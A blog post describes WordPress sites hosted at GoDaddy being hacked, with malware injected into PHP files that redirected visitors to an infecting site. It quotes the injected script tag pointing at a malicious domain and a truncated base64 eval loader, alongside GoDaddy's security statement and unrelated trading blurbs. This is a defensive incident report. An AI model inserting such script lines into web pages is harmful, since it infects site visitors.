There is an undetermined number of sites hosted at GoDaddy Server that have been attacked and exploited and unfortuanely Mine is one among them. The scenario is the same as a few months ago: Malware is injected into the .php files(WordPress) on the hosted sites, and the visitors of a site are getting redirected to a third website which injects a virus into the visitors’ computer. (GoDaddy sites hacked – myblindstudioinfoonline.com and Hilary Kneber )
All the sites we’ve seen so far contain the following javascript added to all PHP files:
<script src="https://myblindstudioinfoonline.com/ll.php"
Which are generated by a very long eval(base64_decode line:
eval(base64_decode("aWYoZnVuY3Rpb....
Now i had restored all my webpages back to normal. Now I really hate those hackers!
Wasted more than 5 hours in recovery itself!
If you’re on GoDaddy Server & hosted WordPress Website, a major malware infection is going around. Kindly check yours and get solved soon!
Related Readings and Observations
How my wordpress blog got attacked and restored How my wordpresss blog got attached and restored an awesome journey to care about web security. If you are a wordpress blog owner then it is a must to focus on security.
Short Update on India VIX and Open Interest During the entire month of august and September(till date) India VIX value remains below 18 signifying that there are high chances of continuation of compressed/sideways market.
Nifty – Probable Flat Formation As we can see in the daily chart,If we label 6342 (3 Nov 2013) to 5972 ( 22 Nov 2013) as wave A, gradually wave has to be labeled at 6415 (9 Dec 2013). The C wave has been confirmed when […]
Ola Goes Cashless on Auto & Taxi Rides Ola is India’s leading mobile app for Intermediary Personal Transportation (IPT). About six months ago Ola launched auto booking through its app. There is, currently, over 40,000 autos are […]
Trading Around the Psychological Round Numbers Trading around the Psychological round numbers like 7000, 8000, 9000 are never been a easier task mentally. This is where many trading participants come up with weird forecasting stuff and […]
Rotation Factor – Amibroker AFL Code Rotation Factor is a sentimental indicator used in Market Profile to Indicate who is control (Buyers/Sellers) in the market for the day. If the rotational factor prints positive values […]
An exploit affected PHP files on approximately 150 Go Daddy accounts Friday afternoon. Go Daddy’s Security Team worked quickly to clean and restore these websites, however, we have detected additional customer sites that may currently be experiencing difficulties due to this same attack.
Go Daddy’s Security Team has identified the cause. Our forensics have determined malicious files are being uploaded via FTP to customer websites. Go Daddy is asking all customers who believe they have a problem to change their FTP passwords.
Meantime, our team is working swiftly to restore all affected websites and appreciates customer feedback. Go Daddy will continue to monitor as long as it takes to ensure our customer accounts are clean.
If you suspect your site was impacted, please fill out our security submission form, located here -- http://www.godaddy.com/securityissue.
Thank you,
Todd Redfoot
Go Daddy Chief Information Security Officer
Hi Rajandran R,
I guess you could have used the steps given in this link…
http://hubpages.com/hub/Godaddy-Malware-Issue-Fixed
dont know how the hell they made this good tool, but it works for sure…
We surely need some more people like these… 🙂